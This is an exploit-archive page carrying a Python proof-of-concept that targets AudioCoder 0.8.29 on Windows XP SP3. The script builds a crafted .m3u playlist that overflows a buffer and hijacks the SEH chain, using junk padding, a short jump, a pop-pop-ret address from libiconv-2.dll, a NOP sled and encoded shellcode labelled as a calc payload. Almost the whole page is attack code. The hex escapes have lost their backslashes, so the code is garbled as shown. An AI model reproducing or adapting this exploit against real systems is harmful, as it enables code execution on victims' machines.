Home / exploits AudioCoder 0.8.29 Memory Corruption
Posted on 01 April 2014
########################################################### #[~] Exploit Title: AudioCoder-0.8.29 Memory Corruption to Code execution[SEH] #[~] Author: sajith #[~] version: AudioCoder-0.8.29 #[~] vulnerable app link: http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.29.exe #[~]Tested in windows Xp sp3,english ########################################################### import struct raw_input("Letz start fuzzing") print "POC by sajith shetty" try: f = open("victim.m3u","w") header = "http://" buffer = 5000 junk = "x41" * 757 nseh = "xebx06x90x90" #jmp 6 bytes seh = struct.pack('<I',0x66010686) #pop pop ret seq from application dll"libiconv-2.dll" junk2 = "x44" * (buffer - (len(junk+nseh+seh))) nops = "x90" * 100 #calc shellcode shellcode = ("xb8x9dx01x15xd1xdaxd2xd9x74x24xf4x5ax31xc9xb1" "x32x31x42x12x03x42x12x83x77xfdxf7x24x7bx16x7e" "xc6x83xe7xe1x4ex66xd6x33x34xe3x4bx84x3exa1x67" "x6fx12x51xf3x1dxbbx56xb4xa8x9dx59x45x1dx22x35" "x85x3fxdex47xdax9fxdfx88x2fxe1x18xf4xc0xb3xf1" "x73x72x24x75xc1x4fx45x59x4exefx3dxdcx90x84xf7" "xdfxc0x35x83xa8xf8x3excbx08xf9x93x0fx74xb0x98" "xe4x0ex43x49x35xeex72xb5x9axd1xbbx38xe2x16x7b" "xa3x91x6cx78x5exa2xb6x03x84x27x2bxa3x4fx9fx8f" "x52x83x46x5bx58x68x0cx03x7cx6fxc1x3fx78xe4xe4" "xefx09xbexc2x2bx52x64x6ax6dx3excbx93x6dxe6xb4" "x31xe5x04xa0x40xa4x42x37xc0xd2x2bx37xdaxdcx1b" "x50xebx57xf4x27xf4xbdxb1xd8xbex9cx93x70x67x75" "xa6x1cx98xa3xe4x18x1bx46x94xdex03x23x91x9bx83" "xdfxebxb4x61xe0x58xb4xa3x83x3fx26x2fx44") print len(junk2) f.write(header + junk + nseh + seh + nops + shellcode + junk2) print "Done!!" except: print "error!"
